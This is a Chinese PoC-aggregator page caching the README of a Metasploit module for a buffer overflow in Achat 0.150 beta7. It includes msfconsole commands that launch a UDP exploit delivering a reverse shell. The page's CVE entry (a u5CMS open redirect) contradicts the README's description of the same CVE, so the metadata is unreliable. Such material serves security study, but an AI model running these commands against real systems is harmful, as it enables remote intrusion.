POC详情: 89906cddd2c852c4118e2d24ba9c21f7806890ab

来源
https://github.com/yaldobaoth/CVE-2015-1578-PoC-Metasploit
关联漏洞
标题: u5CMS 开放重定向漏洞 (CVE-2015-1578)
描述:u5CMS是一套基于PHP、MySQL和Apache的且用于中型网站、会议、审核流程、PayPal支付和在线调查的内容管理系统(CMS)。该系统支持所见即所得编辑器、创建调查表单和数据存储等。 u5CMS 3.9.4之前版本中存在开放重定向漏洞。远程攻击者可借助u5admin/pidvesa.php脚本的pidvesa cookie或u5admin/meta2.php脚本的‘uri’参数利用该漏洞将用户重定向到任意Web网站,实施钓鱼攻击。
描述
This is a proof-of-concept Metasploit module exploit for CVE-2015-1578, a buffer overflow vulnerability in Achat 0.150 beta7 on Windows. Exploitation leads to remote code execution via a crafted UDP packet.
介绍
# CVE-2015-1578 Metasploit Module

## Overview

This is a Metasploit module for **CVE-2015-1578**, a buffer overflow vulnerability in **Achat 0.150 beta7** on Windows. Exploitation leads to remote code execution via a crafted UDP packet.

## Purpose

This module is designed to serve as a clean, minimal, and well-structured example of Metasploit exploit development. It demonstrates:

- Dynamic Unicode-encoded shellcode generation via `msfvenom`
- Manual payload injection (bypassing Metasploit's internal payload encoder)
- Simple UDP-based delivery mechanism
- Integration into the Metasploit Framework using custom module loading

## Video Tutorial

[![Video Tutorial](https://img.youtube.com/vi/f3Bn3VAzc3g/sddefault.jpg)](https://youtu.be/f3Bn3VAzc3g)

## Dependencies

- Metasploit Framework
- `msfvenom` in your `$PATH`

## Features

- Uses `msfvenom` to generate payload with `x86/unicode_mixed` encoding and custom bad characters
- Avoids Metasploit’s built-in payload encoding system to work around encoder limitations

## Installation

```bash
./install.sh
```

Then launch Metasploit and run:
```
reload_all
use exploit/windows/yaldobaoth/achat_bof
```
Options

- `RHOSTS` – Target IP address (required)
- `LHOST` – Local host IP for reverse shell (required)
- `LPORT` – Local port for reverse shell (default: 4444)
- `RPORT` – Remote UDP port on target (default: 9256)

Usage Example
```
msfconsole
use exploit/windows/yaldobaoth/achat_bof
set RHOSTS 10.10.10.74
set LHOST 10.10.16.7
set LPORT 9393
run
```

This will:
- Generate a Unicode-compatible reverse shell payload with msfvenom
- Inject it into the vulnerable Achat buffer over UDP
- Listen for the shell on the specified `LHOST:LPORT`
文件快照

 [4.0K]  /data/pocs/89906cddd2c852c4118e2d24ba9c21f7806890ab
├── [4.7K]  achat_bof.rb
├── [ 295]  install.sh
└── [1.7K]  README.md

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。